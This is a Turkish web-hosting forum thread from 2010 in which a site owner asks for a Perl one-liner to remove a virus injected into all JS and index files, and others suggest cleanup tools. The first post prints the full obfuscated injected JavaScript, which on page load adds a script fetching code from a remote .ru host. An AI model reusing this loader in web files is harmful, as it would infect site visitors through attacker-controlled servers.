• 11-02-2010, 22:07:31
    #1
    Kimlik doğrulama veya yönetimden onay bekliyor.
    Merhaba arkdaşlar, Perl hakkında en ufak bilgim olmadığı için yardımınız gerekiyor. Sunucumdaki 2 büyük sitenin tüm js ve index dosyalarına aynı kodlu virüs bulaşmış durumda. Sitelerde FCK ve TINYMCE editörlerde olduğu için çok sayıda JS dosyası bulunuyor. Bunları manuel olarak sağlıklı bir şekilde temizlemem imkansız gibi görünüyor.

    Perl bilgisi olan arkadaşlardan ricam 1 satırlık preg_replace fonksiyonu olacak. Tabi PERL'de bu varsa.


    this.__='';var b;if(b!='' && b!='z'){b=''};var t=document;var m;if(m!=''){m='ez'};var w='sPcbrbi3p3tZ'.replace(/[Z3bmP]/g, '');var k=window;var wg;if(wg!='uv' && wg!='up'){wg='uv'};var g;if(g!='uk' && g!='ms'){g=''};var h_=new String();k.onload=function(){try {var ej;if(ej!=''){ej='i'};var ukq=new String();_=t.createElement(w);var ci=20378;var a=new Date();var ad;if(ad!=''){ad='ar'};var x='';var qe='';var wc='';_.src='hQt9t9pQ:+/+/Rd9uSoQwQaRnR-ScRoRm9.+gSo+oSgSl+e9.SeSsQ.Ql9o+wReRs+-ScQo9mR.Sh9o9mQeSsRiQt9eSdReQs9iQgSnSs9.QrRu9:+8+0+8S09/RsSt+aRtSc+oRuQnQt9eQr9.+c9o9m+/9s+tRa+tRc9oQuRn9t+eSrQ.Sc9o+mS/+g+o9oQg9l+eQ.9cRo+mR/SbShSaRrQaStRsQt9uQdSeSnRtQ.+cSo9mR/+rRaQp9iSdQ4QmSe+.9c9oSmR/Q'.replace(/[Q\+SR9]/g, '');this.cl=6042;var du;if(du!='' && du!='arn'){du=null};_.setAttribute('d1e1fjejrj'.replace(/[j\+Ag1]/g, ''), "1");this.kw='';this.vd="vd";t.body.appendChild(_);var gwt;if(gwt!='a_' && gwt != ''){gwt=null};} catch(e){var df;if(df!='' && df!='kp'){df=''};this.yc=1222;};var nt=new String();};this.uq='';var s="";

    Virüs yukarıdaki şekilde js dosyalarına, başına <script> ekleyerek de diğer dosyalara bulaşıyor.

    perl -p -i -e 's/one/two/g' *.php bu kod ise SSH ile aynı dizindeki PHP dosyaları içerisinde 'one' yazısını two ile değiştiriyor. Sizden ricam tüm alt klasörlerdeki php dosyalarında
     this.__='';var b;if(b!='' && b!='z')
    ve
     this.uq='';var s="";
    arasındaki kodu silecek bir betik yazmanız.

    Eğer bu başarılı olursa bu illetle uğraşmak zorunda kalan kişilerede yardımı olacaktır diye düşünüyorum.

    Teşekkür ederim.
  • 13-02-2010, 00:42:13
    #2
    Hocam o virüsün Allah belasını versin.
    bana 2 kere bulaşmıştı öldüm temizleyene kadar, eğer böyle bir kod yazarsan etkisiz hale getirebilecek çok dua alırsın insanlardan haberin olsun

    selamlar
  • 08-03-2010, 17:51:44
    #3
    Kodun yeterli derecede işe yarıyacağını pek zannetmiyorum zira bir çok kişi denesede farklı yöntemler bulunabiliyor... en güzeli backup ve kilit yöntemi...
  • 16-04-2010, 19:45:01
    #4
    advanced find and replace programini oneririm, gecenlerde forumda bulmustum.
  • 17-04-2010, 20:58:46
    #5
    Kimlik doğrulama veya yönetimden onay bekliyor.
    sistem dosyalarına bulaşanı denemedim ama sitelere toplu halde bulaşanı Frontpage ile çok kısa zamanda yapıyorum. bence her dosyada etkili olur. yapılması gereken mesela tum C:/Inetpub dizini içerisindeki dosyalara bulaşmış ise Frontpage ile site aç diyip C:/Inetpub klasörörünü veya C:/ içerisindeki istenilen klasörü. seçip sonrada virüs satırını.tüm sayfalarda ara. işaretli ve kaynak kodlarında ara işeretli yapıp dene.
  • 20-04-2010, 18:19:41
    #6
    Reaky adlı üyeden alıntı: mesajı görüntüle
    advanced find and replace programini oneririm, gecenlerde forumda bulmustum.
    Aynen.